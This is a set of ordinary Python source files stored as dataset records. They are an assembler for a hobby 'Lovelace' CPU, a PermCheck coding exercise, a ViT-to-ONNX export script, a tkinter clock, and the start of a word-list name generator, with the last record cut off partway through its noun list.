0x0c,\n\t\t\"ACC ADR\": 0x0d,\n\t\t\"LIT ADR\": 0x0e,\n\t\t\"R0 ZP\": 0x0f,\n\t\t\"R1 ZP\": 0x10,\n\t\t\"R2 ZP\": 0x11,\n\t\t\"R3 ZP\": 0x12,\n\t\t\"ACC ZP\": 0x13,\n\t\t\"LIT ZP\": 0x14,\n\t},\n\t\"STRI\": {\n\t\t\"R0 ADR\": 0x15,\n\t\t\"R1 ADR\": 0x16,\n\t\t\"R2 ADR\": 0x17,\n\t\t\"R3 ADR\": 0x18,\n\t\t\"ACC ADR\": 0x19,\n\t\t\"LIT ADR\": 0x56,\n\t}, \"STRIZ\": {\n\t\t\"R0 ZP\": 0x1a,\n\t\t\"R1 ZP\": 0x1b,\n\t\t\"R2 ZP\": 0x1c,\n\t\t\"R3 ZP\": 0x1d,\n\t\t\"ACC ZP\": 0x1e,\n\t\t\"LIT ZP\": 0x57,\n\t},\n\t\"LOD\": {\n\t\t\"ADR R0\": 0x1f,\n\t\t\"ADR R1\": 0x20,\n\t\t\"ADR R2\": 0x21,\n\t\t\"ADR R3\": 0x22,\n\t\t\"ADR ACC\": 0x23,\n\t\t\"ZP R0\": 0x24,\n\t\t\"ZP R1\": 0x25,\n\t\t\"ZP R2\": 0x26,\n\t\t\"ZP R3\": 0x27,\n\t\t\"ZP ACC\": 0x28,\n\t\t\"LIT R0\": 0x29,\n\t\t\"LIT R1\": 0x2a,\n\t\t\"LIT R2\": 0x2b,\n\t\t\"LIT R3\": 0x2c,\n\t\t\"LIT ACC\": 0x2d,\n\t},\n\t\"LODI\": {\n\t\t\"ADR R0\": 0x2e,\n\t\t\"ADR R1\": 0x2f,\n\t\t\"ADR R2\": 0x30,\n\t\t\"ADR R3\": 0x31,\n\t\t\"ADR ACC\": 0x32,\n\t}, \"LODIZ\": {\n\t\t\"ZP R0\": 0x33,\n\t\t\"ZP R1\": 0x34,\n\t\t\"ZP R2\": 0x35,\n\t\t\"ZP R3\": 0x36,\n\t\t\"ZP ACC\": 0x37,\n\t},\n\t\"TRN\": {\n\t\t\"R0 R1\": 0x38,\n\t\t\"R0 R2\": 0x39,\n\t\t\"R0 R3\": 0x3a,\n\t\t\"R0 ACC\": 0x3b,\n\t\t\"R1 R0\": 0x3c,\n\t\t\"R1 R2\": 0x3d,\n\t\t\"R1 R3\": 0x3e,\n\t\t\"R1 ACC\": 0x3f,\n\t\t\"R2 R0\": 0x40,\n\t\t\"R2 R1\": 0x41,\n\t\t\"R2 R3\": 0x42,\n\t\t\"R2 ACC\": 0x43,\n\t\t\"R3 R0\": 0x44,\n\t\t\"R3 R1\": 0x45,\n\t\t\"R3 R2\": 0x46,\n\t\t\"R3 ACC\": 0x47,\n\t\t\"ACC R0\": 0x48,\n\t\t\"ACC R1\": 0x49,\n\t\t\"ACC R2\": 0x4a,\n\t\t\"ACC R3\": 0x4b,\n\t\t\"SP R0\": 0x4c,\n\t\t\"SP R1\": 0x4d,\n\t\t\"SP R2\": 0x4e,\n\t\t\"SP R3\": 0x4f,\n\t\t\"SP ACC\": 0x50,\n\t\t\"FLG R0\": 0x51,\n\t\t\"FLG R1\": 0x52,\n\t\t\"FLG R2\": 0x53,\n\t\t\"FLG R3\": 0x54,\n\t\t\"FLG ACC\": 0x55,\n\t},\n\t\"ADD\": {\n\t\t\"R0\": 0x5e,\n\t\t\"R1\": 0x5f,\n\t\t\"R2\": 0x60,\n\t\t\"R3\": 0x61,\n\t\t\"ACC\": 0x62,\n\t\t\"LIT\": 0x63,\n\t},\n\t\"ADDC\": {\n\t\t\"R0\": 0x64,\n\t\t\"R1\": 0x65,\n\t\t\"R2\": 0x66,\n\t\t\"R3\": 0x67,\n\t\t\"ACC\": 0x68,\n\t\t\"LIT\": 0x69,\n\t},\n\t\"SUB\": {\n\t\t\"R0\": 0x6a,\n\t\t\"R1\": 0x6b,\n\t\t\"R2\": 0x6c,\n\t\t\"R3\": 0x6d,\n\t\t\"LIT\": 0x6e,\n\t},\n\t\"SUBC\": {\n\t\t\"R0\": 0x6f,\n\t\t\"R1\": 0x70,\n\t\t\"R2\": 0x71,\n\t\t\"R3\": 0x72,\n\t\t\"LIT\": 0x73,\n\t},\n\t\"SHR\": {\n\t\t\"R0\": 0x74,\n\t\t\"R1\": 0x75,\n\t\t\"R2\": 0x76,\n\t\t\"R3\": 0x77,\n\t\t\"ACC\": 0x78,\n\t\t\"LIT\": 0x79,\n\t},\n\t\"SHL\": {\n\t\t\"R0\": 0x7a,\n\t\t\"R1\": 0x7b,\n\t\t\"R2\": 0x7c,\n\t\t\"R3\": 0x7d,\n\t\t\"ACC\": 0x7e,\n\t\t\"LIT\": 0x7f,\n\t},\n\t\"AND\": {\n\t\t\"R0\": 0x80,\n\t\t\"R1\": 0x81,\n\t\t\"R2\": 0x82,\n\t\t\"R3\": 0x83,\n\t\t\"LIT\": 0x84,\n\t},\n\t\"OR\": {\n\t\t\"R0\": 0x85,\n\t\t\"R1\": 0x86,\n\t\t\"R2\": 0x87,\n\t\t\"R3\": 0x88,\n\t\t\"LIT\": 0x89,\n\t},\n\t\"XOR\": {\n\t\t\"R0\": 0x8a,\n\t\t\"R1\": 0x8b,\n\t\t\"R2\": 0x8c,\n\t\t\"R3\": 0x8d,\n\t\t\"LIT\": 0x8e,\n\t},\n\t\"NOT\": {\n\t\t\"\": 0x8f,\n\t},\n\t\"INC\": {\n\t\t\"R0\": 0x90,\n\t\t\"R1\": 0x91,\n\t\t\"R2\": 0x92,\n\t\t\"R3\": 0x93,\n\t\t\"ACC\": 0x94,\n\t},\n\t\"DEC\": {\n\t\t\"R0\": 0x95,\n\t\t\"R1\": 0x96,\n\t\t\"R2\": 0x97,\n\t\t\"R3\": 0x98,\n\t\t\"ACC\": 0x99,\n\t},\n\t\"PSH\": {\n\t\t\"R0\": 0xa2,\n\t\t\"R1\": 0xa3,\n\t\t\"R2\": 0xa4,\n\t\t\"R3\": 0xa5,\n\t\t\"ACC\": 0xa6,\n\t\t\"LIT\": 0xa7,\n\t},\n\t\"POP\": {\n\t\t\"R0\": 0xa8,\n\t\t\"R1\": 0xa9,\n\t\t\"R2\": 0xaa,\n\t\t\"R3\": 0xab,\n\t\t\"ACC\": 0xac,\n\t},\n\t\"DRP\": {\n\t\t\"\": 0xad,\n\t},\n\t\"CMP\": {\n\t\t\"R0 R1\": 0xb6,\n\t\t\"R0 R2\": 0xb7,\n\t\t\"R0 R3\": 0xb8,\n\t\t\"R0 ACC\": 0xb9,\n\t\t\"R1 R0\": 0xba,\n\t\t\"R1 R2\": 0xbb,\n\t\t\"R1 R3\": 0xbc,\n\t\t\"R1 ACC\": 0xbd,\n\t\t\"R2 R0\": 0xbe,\n\t\t\"R2 R1\": 0xbf,\n\t\t\"R2 R3\": 0xc0,\n\t\t\"R2 ACC\": 0xc1,\n\t\t\"R3 R0\": 0xc2,\n\t\t\"R3 R1\": 0xc3,\n\t\t\"R3 R2\": 0xc4,\n\t\t\"R3 ACC\": 0xc5,\n\t\t\"ACC R0\": 0xc6,\n\t\t\"ACC R1\": 0xc7,\n\t\t\"ACC R2\": 0xc8,\n\t\t\"ACC R3\": 0xc9,\n\t\t\"R0 LIT\": 0xca,\n\t\t\"R1 LIT\": 0xcb,\n\t\t\"R2 LIT\": 0xcc,\n\t\t\"R3 LIT\": 0xcd,\n\t\t\"ACC LIT\": 0xce,\n\t},\n\t\"BRA\": {\n\t\t\"S ADR\": 0xcf,\n\t\t\"C ADR\": 0xd0,\n\t\t\"I ADR\": 0xd1,\n\t\t\"O ADR\": 0xd2,\n\t\t\"G ADR\": 0xd3,\n\t\t\"Z ADR\": 0xd4,\n\t},\n\t\"BRAN\": {\n\t\t\"S ADR\": 0xd5,\n\t\t\"C ADR\": 0xd6,\n\t\t\"I ADR\": 0xd7,\n\t\t\"O ADR\": 0xd8,\n\t\t\"G ADR\": 0xd9,\n\t\t\"Z ADR\": 0xda,\n\t},\n\t\"JMP\": {\n\t\t\"ADR\": 0xdb,\n\t},\n\t\"JMPI\": {\n\t\t\"ADR\": 0xdc,\n\t},\n\t\"JSR\": {\n\t\t\"ADR\": 0xdd,\n\t},\n\t\"JSRI\": {\n\t\t\"ADR\": 0xde,\n\t},\n\t\"RET\": {\n\t\t\"\": 0xdf,\n\t},\n\t\"RETI\": {\n\t\t\"\": 0xe0,\n\t},\n\t\"SET\": {\n\t\t\"S\": 0xe9,\n\t\t\"C\": 0xea,\n\t\t\"I\": 0xeb,\n\t\t\"O\": 0xec,\n\t\t\"G\": 0xed,\n\t\t\"Z\": 0xee,\n\t},\n\t\"CLR\": {\n\t\t\"S\": 0xef,\n\t\t\"C\": 0xf0,\n\t\t\"I\": 0xf1,\n\t\t\"O\": 0xf2,\n\t\t\"G\": 0xf3,\n\t\t\"Z\": 0xf4,\n\t}\n}\n\ndef parse_number(arg):\n\tif arg[0] in \"0123456789\":\n\t\treturn int(arg)\n\tif arg.startswith(\"!\"):\n\t\treturn int(arg[1:])\n\tif arg.startswith(\"$\"):\n\t\treturn int(arg[1:], 16)\n\tif arg.startswith(\"%\"):\n\t\treturn int(arg[1:], 2)\n\ndef interpret_argument(arg, instruction):\n\tif arg.startswith(\":\"):\n\t\treturn \"ADR\"\n\telif arg.startswith(\"R\"):\n\t\treturn arg\n\telif arg in \"SCIOGZ\":\n\t\treturn arg\n\telif arg.startswith(\"#\"):\n\t\treturn \"LIT\"\n\telif arg.startswith(\">\"): # access right byte of label as literal\n\t\treturn \"LIT\"\n\telif arg.startswith(\"<\"): # access left byte of label as literal\n\t\treturn \"LIT\"\n\telif arg[0] in \"0123456789$%!\":\n\t\tif parse_number(arg) < 256 and instruction in [\"STR\", \"STRIZ\", \"LOD\", \"LODIZ\"]:\n\t\t\treturn \"ZP\"\n\t\telse:\n\t\t\treturn \"ADR\"\n\telif arg in [\"ACC\", \"SP\", \"FLG\"]:\n\t\treturn arg\n\telif arg in constants_lit:\n\t\treturn \"LIT\"\n\telif arg in constants_adr:\n\t\tif parse_number(constants_adr[arg]) < 256 and instruction in [\"STR\", \"STRIZ\", \"LOD\", \"LODIZ\"]:\n\t\t\treturn \"ZP\"\n\t\telse:\n\t\t\treturn \"ADR\"\n\telse:\n\t\traise Exception(\"Invalid argument: \" + arg)\n\ndef argument_size(arg):\n\tif arg == \"ADR\":\n\t\treturn 2\n\tif arg == \"ZP\":\n\t\treturn 1\n\tif arg == \"LIT\":\n\t\treturn 1\n\treturn 0\n\n# Possibly make addresses controlled by floppy controller\ndef compile(source, location=0x0200):\n\tglobal constants_lit\n\tglobal constants_adr\n\n\tlabels = {}\n\tinstructions = []\n\tlength = 0\n\tconstants_lit = {}\n\tconstants_adr = {}\n\n\tfor line in source.split(\"\\n\"):\n\t\tparts = line.strip().upper().split(\";\")[0].split()\n\n\t\tif not parts:\n\t\t\tcontinue\n\n\t\tif parts[0].startswith(\":\"):\n\t\t\tassert len(parts) == 1, \"Whitespace isn't allowed in label names\"\n\t\t\tlabels[parts[0][1:]] = length + location\n\t\telif parts[0].startswith(\"LIT\"):\n\t\t\tconstants_lit[parts[1]] = parts[2]\n\t\telif parts[0].startswith(\"ADR\"):\n\t\t\tconstants_adr[parts[1]] = parts[2]\n\t\telse:\n\t\t\tif parts[0] == \"BYTES\":\n\t\t\t\tinstructions.append(parts)\n\t\t\t\tlength += sum(map(argument_size,\n\t\t\t\t\tmap(partial(interpret_argument, instruction=parts[0]), parts[1:])))\n\t\t\t\tcontinue\n\n\t\t\tassert (parts[0] in mnemonics), \"Unrecognized mnemonic: \" + parts[0]\n\t\t\tinstructions.append(parts)\n\n\t\t\tlength += 1 + sum(map(argument_size,\n\t\t\t\tmap(partial(interpret_argument, instruction=parts[0]), parts[1:])))\n\n\tfor instruction in instructions:\n\t\tprint(instruction)\n\t\tif (instruction[0] != \"BYTES\"):\n\t\t\tyield mnemonics[instruction[0]][\n\t\t\t\t\" \".join(map(partial(interpret_argument,\n\t\t\t\t\tinstruction=instruction[0]), instruction[1:]))]\n\n\t\tfor arg in instruction[1:]:\n\t\t\tif arg in constants_lit:\n\t\t\t\targ = constants_lit[arg]\n\t\t\tif arg in constants_adr:\n\t\t\t\targ = constants_adr[arg]\n\t\t\ttype = interpret_argument(arg, instruction[0])\n\t\t\tif type == \"ADR\":\n\t\t\t\tif arg[0] == \":\":\n\t\t\t\t\taddress = labels[arg[1:]]\n\t\t\t\telse:\n\t\t\t\t\taddress = parse_number(arg)\n\t\t\t\tyield address >> 8\n\t\t\t\tyield address & 0xff\n\t\t\telif type == \"ZP\":\n\t\t\t\tyield parse_number(arg)\n\t\t\telif type == \"LIT\":\n\t\t\t\tif arg[0] == \"<\":\n\t\t\t\t\tyield parse_number(str(labels[arg[2:]] & 0xFF))\n\t\t\t\telif arg[0] == \">\":\n\t\t\t\t\tyield parse_number(str((labels[arg[2:]] >> 8) & 0xFF))\n\t\t\t\telse:\n\t\t\t\t\tyield parse_number(arg[1:])\n\tprint(\"\\nLabels:\")\n\tfor i in labels:\n\t\tprint(i + \" = \" + hex(labels[i]))\n\tprint(\"\\nAddress Constants:\")\n\tfor i in constants_adr:\n\t\tprint(i + \" = \" + str(constants_adr[i]))\n\tprint(\"\\nLiteral Constants:\")\n\tfor i in constants_lit:\n\t\tpass\n\t\tprint(i + \" = \" + str(constants_lit[i]))\n\nif __name__ == \"__main__\":\n\tp = argparse.ArgumentParser(description=\"Assemble Lovelace assembly language.\")\n\tp.add_argument(\"file\", help=\"an input assembly file\")\n\tp.add_argument(\"-o\", \"--output\", default=\"lovelace.o\",\n\t\thelp=\"the output filename\")\n\tp.add_argument(\"-f\", \"--offset\", default=\"0x0200\", type=ast.literal_eval,\n\t\thelp=\"the address offset to use for labels\")\n\n\targs = p.parse_args()\n\twith open(args.file) as f:\n\t\tsource = f.read()\n\n\tprint(\"\\nInstructions:\")\n\tcode = bytes(compile(source, args.offset))\n\n\tprint(\"\\nBytes:\")\n\tprint(\"0x\" + \", 0x\".join(code.hex()[i:i+2] for i in range(0, len(code.hex()), 2)))\n\twith open(args.output, \"wb\") as f:\n\t\tf.write(code)\n","repo_name":"DivergentClouds/Lovelace","sub_path":"asm/py-assembler/assemble.py","file_name":"assemble.py","file_ext":"py","file_size_in_byte":7918,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"7"} +{"seq_id":"38835924567","text":"# you can write to stdout for debugging purposes, e.g.\n# print \"this is a debug message\"\nfrom collections import defaultdict\n\ndef solution(A):\n # write your code in Python 2.7\n lenA = len(A)\n sumA = sum(A)\n dictCount = defaultdict(int)\n for item in A:\n dictCount[item] += 1\n if max(dictCount.values()) == 1 and lenA * (lenA + 1) // 2 == sumA:\n return 1\n return 0\n","repo_name":"sshishov/sshishov.github.io","sub_path":"codility/04_lesson/02_PermCheck.py","file_name":"02_PermCheck.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72844621982","text":"\"\"\"\r\nCopyright 2020 Huawei Technologies Co., Ltd\r\n\r\nLicensed under the Apache License, Version 2.0 (the \"License\");\r\nyou may not use this file except in compliance with the License.\r\nYou may obtain a copy of the License at\r\n\r\n http://www.apache.org/licenses/LICENSE-2.0\r\n\r\nUnless required by applicable law or agreed to in writing, software\r\ndistributed under the License is distributed on an \"AS IS\" BASIS,\r\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\nSee the License for the specific language governing permissions and\r\nlimitations under the License.\r\n\"\"\"\r\nimport os\r\nimport torch\r\nimport timm\r\nimport argparse\r\n\r\n\r\ndef parse_arguments():\r\n parser = argparse.ArgumentParser(description='Path', add_help=False)\r\n parser.add_argument('--model_path', required=True, metavar='DIR',\r\n help='path to model')\r\n parser.add_argument('--save_dir', default=\"models/onnx\", type=str,\r\n help='save dir for onnx model')\r\n parser.add_argument('--batch_size', default=1, type=int,\r\n help='batch size')\r\n parser.add_argument('--model_name', required=True, type=str,\r\n help='model name for ViT')\r\n \r\n return parser.parse_args()\r\n\r\n\r\ndef main():\r\n args = parse_arguments()\r\n model = timm.create_model(args.model_name)\r\n model.load_pretrained(args.model_path)\r\n model.eval()\r\n input_size = int(args.model_name[-3:])\r\n tensor = torch.zeros(args.batch_size, 3, input_size, input_size)\r\n\r\n if not os.path.exists(args.save_dir):\r\n os.makedirs(args.save_dir)\r\n\r\n save_path = os.path.join(args.save_dir,\r\n f\"{args.model_name}_bs{args.batch_size}.onnx\")\r\n torch.onnx.export(model, tensor, save_path, opset_version=11,\r\n do_constant_folding=True, input_names=[\"input\"], output_names=[\"output\"])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"ACL_PyTorch/contrib/cv/classfication/ViT_base/Vit_base_pth2onnx.py","file_name":"Vit_base_pth2onnx.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"} +{"seq_id":"42830066096","text":"#Hayden Whitney\n#9/18\n#Clock\n\nfrom tkinter import*\nfrom tkinter import ttk\nfrom tkinter import font\nimport time\nimport calendar\nimport datetime\n\ndef gmtnow():\n total_seconds = calendar.timegm(time.gmtime())\n current_second = total_seconds % 60\n total_minutes = total_seconds //60\n current_minute = total_minutes % 60\n total_hours = total_minutes // 60\n current_hour = total_hours % 24\n current_hour = current_hour - 6\n if current_hour >= 12:\n tag = \" PM\"\n else:\n tag = \" AM\"\n timex = str(current_hour) + \":\" + str(current_minute) + \":\" + str(current_second) + tag\n return timex\n\ndef quit(*args):\n root.destroy()\n\ndef show_time():\n time = gmtnow()\n txt.set(time)\n root.after(1000, show_time)\n\nroot = Tk()\nroot.attributes(\"-fullscreen\", False)\nroot.configure(background = 'White')\nroot.bind(\"x\", quit)\nroot.after(1000, show_time)\n\nfnt = font.Font(family = 'Courier', size = 60)\ntxt = StringVar()\nlbl = ttk.Label(root, textvariable = txt, font = fnt, foreground = 'Black', background = 'White')\nlbl.place(relx = 0.5, rely = 0.5, anchor = CENTER)\n\nroot.mainloop()\n\n \n\n\n\n","repo_name":"haydenwhitney/portfolio","sub_path":"Clock/clock.py","file_name":"clock.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24566472647","text":"import random\n\nadjectives = [\n \"abandoned\",\n \"aching\",\n \"advanced\",\n \"ample\",\n \"artistic\",\n \"back\",\n \"best\",\n \"bold\",\n \"brief\",\n \"clear\",\n \"cold\",\n \"complicated\",\n \"cooked\",\n \"crazy\",\n \"crushing\",\n \"damp\",\n \"dear\",\n \"definite\",\n \"dependable\",\n \"diligent\",\n \"drab\",\n \"earnest\",\n \"elderly\",\n \"enchanted\",\n \"essential\",\n \"excellent\",\n \"extraneous\",\n \"fixed\",\n \"flowery\",\n \"formal\",\n \"fresh\",\n \"frosty\",\n \"giving\",\n \"glossy\",\n \"healthy\",\n \"helpful\",\n \"impressionable\",\n \"kind\",\n \"large\",\n \"left\",\n \"long\",\n \"loyal\",\n \"mealy\",\n \"memorable\",\n \"monthly\",\n \"new\",\n \"notable\",\n \"only\",\n \"ordinary\",\n \"passionate\",\n \"perfect\",\n \"pertinent\",\n \"proper\",\n \"puzzled\",\n \"reflecting\",\n \"respectful\",\n \"roasted\",\n \"scholarly\",\n \"shiny\",\n \"slight\",\n \"sparkling\",\n \"spotless\",\n \"stupendous\",\n \"sunny\",\n \"tart\",\n \"terrific\",\n \"timely\",\n \"unique\",\n \"upbeat\",\n \"vacant\",\n \"virtual\",\n \"warm\",\n \"weary\",\n \"whispered\",\n \"worthwhile\",\n \"yellow\",\n]\n\nnouns = [\n \"account\",\n \"acknowledgment\",\n \"address\",\n \"advertising\",\n \"airplane\",\n \"animal\",\n \"appointment\",\n \"arrival\",\n \"artist\",\n \"attachment\",\n \"attitude\",\n \"availability\",\n \"backpack\",\n \"bag\",\n \"balance\",\n \"bass\",\n \"bean\",\n \"beauty\",\n \"bibliography\",\n \"bill\",\n \"bite\",\n \"blossom\",\n \"boat\",\n \"book\",\n \"box\",\n \"boy\",\n \"bread\",\n \"bridge\",\n \"broccoli\",\n \"building\",\n \"butter\",\n \"button\",\n \"cabbage\",\n \"cake\",\n \"camera\",\n \"camp\",\n \"candle\",\n \"candy\",\n \"canvas\",\n \"car\",\n \"card\",\n \"carrot\",\n \"cart\",\n \"case\",\n \"cat\",\n \"chain\",\n \"chair\",\n \"chalk\",\n \"chance\",\n \"change\",\n \"channel\",\n \"character\",\n \"charge\",\n \"charm\",\n \"chart\",\n \"check\",\n \"cheek\",\n \"cheese\",\n \"chef\",\n \"cherry\",\n \"chicken\",\n \"child\",\n \"church\",\n \"circle\",\n \"class\",\n \"clay\",\n \"click\",\n \"clock\",\n \"cloth\",\n \"cloud\",\n \"clove\",\n \"club\",\n \"coach\",\n \"coal\",\n \"coast\",\n \"coat\",\n \"cod\",\n \"coffee\",\n \"collar\",\n \"color\",\n \"comb\",\n \"comfort\",\n \"comic\",\n \"committee\",\n \"community\",\n \"company\",\n \"comparison\",\n \"competition\",\n \"condition\",\n \"connection\",\n \"control\",\n \"cook\",\n \"copper\",\n \"copy\",\n \"corn\",\n \"cough\",\n \"country\",\n \"cover\",\n \"crate\",\n \"crayon\",\n \"cream\",\n \"creator\",\n \"crew\",\n \"crown\",\n \"current\",\n \"curtain\",\n \"curve\",\n \"cushion\",\n \"dad\",\n \"daughter\",\n \"day\",\n \"death\",\n \"debt\",\n \"decision\",\n \"deer\",\n \"degree\",\n \"design\",\n \"desire\",\n \"desk\",\n \"detail\",\n \"development\",\n \"digestion\",\n \"dime\",\n \"dinner\",\n \"direction\",\n \"dirt\",\n \"discovery\",\n \"discussion\",\n \"disease\",\n \"disgust\",\n \"distance\",\n \"distribution\",\n \"division\",\n \"doctor\",\n \"dog\",\n \"door\",\n \"drain\",\n \"drawer\",\n \"dress\",\n \"drink\",\n \"driving\",\n \"dust\",\n \"ear\",\n \"earth\",\n \"edge\",\n \"education\",\n \"effect\",\n \"egg\",\n \"end\",\n \"energy\",\n \"engine\",\n \"error\",\n \"event\",\n \"example\",\n \"exchange\",\n \"existence\",\n \"expansion\",\n \"experience\",\n \"expert\",\n \"eye\",\n \"face\",\n \"fact\",\n \"fall\",\n \"family\",\n \"farm\",\n \"father\",\n \"fear\",\n \"feeling\",\n \"field\",\n \"finger\",\n \"fire\",\n \"fish\",\n \"flag\",\n \"flight\",\n \"floor\",\n \"flower\",\n \"fold\",\n \"food\",\n \"football\",\n \"force\",\n \"form\",\n \"frame\",\n \"friend\",\n \"frog\",\n \"fruit\",\n \"fuel\",\n \"furniture\",\n \"game\",\n \"garden\",\n \"gate\",\n \"girl\",\n \"glass\",\n \"glove\",\n \"goat\",\n \"gold\",\n \"government\",\n \"grade\",\n \"grain\",\n \"grass\",\n \"green\",\n \"grip\",\n \"group\",\n \"growth\",\n \"guide\",\n \"guitar\",\n \"hair\",\n \"hall\",\n \"hand\",\n \"harbor\",\n \"harmony\",\n \"hat\",\n \"head\",\n \"health\",\n \"heart\",\n \"heat\",\n \"hill\",\n \"history\",\n \"hobbies\",\n \"hole\",\n \"hope\",\n \"horn\",\n \"horse\",\n \"hospital\",\n \"hour\",\n \"house\",\n \"humor\",\n \"idea\",\n \"impulse\",\n \"income\",\n \"increase\",\n \"industry\",\n \"ink\",\n \"insect\",\n \"instrument\",\n \"insurance\",\n \"interest\",\n \"invention\",\n \"iron\",\n \"island\",\n \"jelly\",\n \"jet\",\n \"jewel\",\n \"join\",\n \"judge\",\n \"juice\",\n \"jump\",\n \"kettle\",\n \"key\",\n \"kick\",\n \"kiss\",\n \"kitten\",\n \"knee\",\n \"knife\",\n \"knowledge\",\n \"land\",\n \"language\",\n \"laugh\",\n \"law\",\n \"lead\",\n \"learning\",\n \"leather\",\n \"leg\",\n \"lettuce\",\n \"level\",\n \"library\",\n \"lift\",\n \"light\",\n \"limit\",\n \"line\",\n \"linen\",\n \"lip\",\n \"liquid\",\n \"list\",\n \"look\",\n \"loss\",\n \"love\",\n \"lunch\",\n \"machine\",\n \"man\",\n \"manager\",\n \"map\",\n \"marble\",\n \"mark\",\n \"market\",\n \"mass\",\n \"match\",\n \"meal\",\n \"measure\",\n \"meat\",\n \"meeting\",\n \"memory\",\n \"metal\",\n \"middle\",\n \"milk\",\n \"mind\",\n \"mine\",\n \"minute\",\n \"mist\",\n \"mitten\",\n \"mom\",\n \"money\",\n \"monkey\",\n \"month\",\n \"moon\",\n \"morning\",\n \"mother\",\n \"motion\",\n \"mountain\",\n \"mouth\",\n \"muscle\",\n \"music\",\n \"nail\",\n \"name\",\n \"nation\",\n \"neck\",\n \"need\",\n \"news\",\n \"night\",\n \"noise\",\n \"note\",\n \"number\",\n \"nut\",\n \"observation\",\n \"offer\",\n \"oil\",\n \"operation\",\n \"opinion\",\n \"orange\",\n \"order\",\n \"organization\",\n \"ornament\",\n \"oven\",\n \"page\",\n \"pail\",\n \"pain\",\n \"paint\",\n \"pan\",\n \"pancake\",\n \"paper\",\n \"parcel\",\n \"parent\",\n \"part\",\n \"passenger\",\n \"paste\",\n \"payment\",\n \"peace\",\n \"pear\",\n \"pen\",\n \"pencil\",\n \"person\",\n \"pest\",\n \"pet\",\n \"picture\",\n \"pie\",\n \"pin\",\n \"pipe\",\n \"pizza\",\n \"place\",\n \"plane\",\n \"plant\",\n \"plastic\",\n \"plate\",\n \"play\",\n \"pleasure\",\n \"plot\",\n \"plough\",\n \"pocket\",\n \"point\",\n \"poison\",\n \"police\",\n \"pollution\",\n \"popcorn\",\n \"porter\",\n \"position\",\n \"pot\",\n \"potato\",\n \"powder\",\n \"power\",\n \"price\",\n \"print\",\n \"process\",\n \"produce\",\n \"product\",\n \"profit\",\n \"property\",\n \"prose\",\n \"protest\",\n \"pull\",\n \"pump\",\n \"punishment\",\n \"purpose\",\n \"push\",\n \"quarter\",\n \"question\",\n \"quiet\",\n \"quill\",\n \"quilt\",\n \"quince\",\n \"rabbit\",\n \"rail\",\n \"rain\",\n \"range\",\n \"rat\",\n \"rate\",\n \"ray\",\n \"reaction\",\n \"reading\",\n \"reason\",\n \"record\",\n \"regret\",\n \"relation\",\n \"religion\",\n \"representative\",\n \"request\",\n \"respect\",\n \"rest\",\n \"reward\",\n \"rhythm\",\n \"rice\",\n \"river\",\n \"road\",\n \"roll\",\n \"room\",\n \"root\",\n \"rose\",\n \"route\",\n \"rub\",\n \"rule\",\n \"run\",\n \"sack\",\n \"sail\",\n \"salt\",\n \"sand\",\n \"scale\",\n \"scarecrow\",\n \"scarf\",\n \"scene\",\n \"scent\",\n \"school\",\n \"science\",\n \"scissors\",\n \"screw\",\n \"sea\",\n \"seat\",\n \"secretary\",\n \"seed\",\n \"selection\",\n \"self\",\n \"sense\",\n \"servant\",\n \"shade\",\n \"shake\",\n \"shame\",\n \"shape\",\n \"sheep\",\n \"sheet\",\n \"shelf\",\n \"ship\",\n \"shirt\",\n \"shock\",\n \"shoe\",\n \"shop\",\n \"show\",\n \"side\",\n \"sign\",\n \"silk\",\n \"sink\",\n \"sister\",\n \"size\",\n \"sky\",\n \"sleep\",\n \"smash\",\n \"smell\",\n \"smile\",\n \"smoke\",\n \"snail\",\n \"snake\",\n \"sneeze\",\n \"snow\",\n \"soap\",\n \"society\",\n \"sock\",\n \"soda\",\n \"sofa\",\n \"son\",\n \"song\",\n \"sort\",\n \"sound\",\n \"soup\",\n \"space\",\n \"spark\",\n \"speed\",\n \"sponge\",\n \"spoon\",\n \"spray\",\n \"spring\",\n \"spy\",\n \"square\",\n \"stamp\",\n \"star\",\n \"start\",\n \"statement\",\n \"station\",\n \"steam\",\n \"steel\",\n \"stem\",\n \"step\",\n \"stew\",\n \"stick\",\n \"stitch\",\n \"stocking\",\n \"stomach\",\n \"stone\",\n \"stop\",\n \"store\",\n \"story\",\n \"stove\",\n \"stranger\",\n \"straw\",\n \"stream\",\n \"street\",\n \"stretch\",\n \"string\",\n \"structure\",\n \"substance\",\n \"sugar\",\n \"suggestion\",\n \"suit\",\n \"summer\",\n \"sun\",\n \"support\",\n \"surprise\",\n \"sweater\",\n \"swim\",\n \"system\",\n \"table\",\n \"tail\",\n \"talk\",\n \"tank\",\n \"taste\",\n \"tax\",\n \"tea\",\n \"teaching\",\n \"team\",\n \"tendency\",\n \"test\",\n \"texture\",\n \"theory\",\n \"thing\",\n \"thought\",\n \"thread\",\n \"throat\",\n \"thumb\",\n \"thunder\",\n \"ticket\",\n \"time\",\n \"tin\",\n \"title\",\n \"toad\",\n \"toe\",\n \"tooth\",\n \"toothpaste\",\n \"touch\",\n \"town\",\n \"toy\",\n \"trade\",\n \"train\",\n \"transport\",\n \"tray\",\n \"treatment\",\n \"tree\",\n \"trick\",\n \"trip\",\n \"trouble\",\n \"trousers\",\n \"truck\",\n \"tub\",\n \"turkey\",\n \"turn\",\n \"twist\",\n \"umbrella\",\n \"uncle\",\n \"underwear\",\n \"unit\",\n \"use\",\n \"vacation\",\n \"value\",\n \"van\",\n \"vase\",\n \"vegetable\",\n \"veil\",\n \"vein\",\n \"verse\",\n \"vessel\",\n \"view\",\n \"visitor\",\n \"voice\",\n \"volcano\",\n \"walk\",\n \"wall\",\n \"war\",\n \"wash\",\n \"waste\",\n \"watch\",\n \"water\",\n \"wave\",\n \"wax\",\n \"way\",\n \"wealth\",\n \"weather\",\n \"week\",\n \"weight\",\n \"wheel\",\n \"whip\",\n \"whistle\",\n \"window\",\n \"wine\",\n \"wing\",\n \"winter\",\n \"wire\",\n \"wish\",\n \"woman\",\n \"wood\",\n \"wool\",\n \"word\",\n 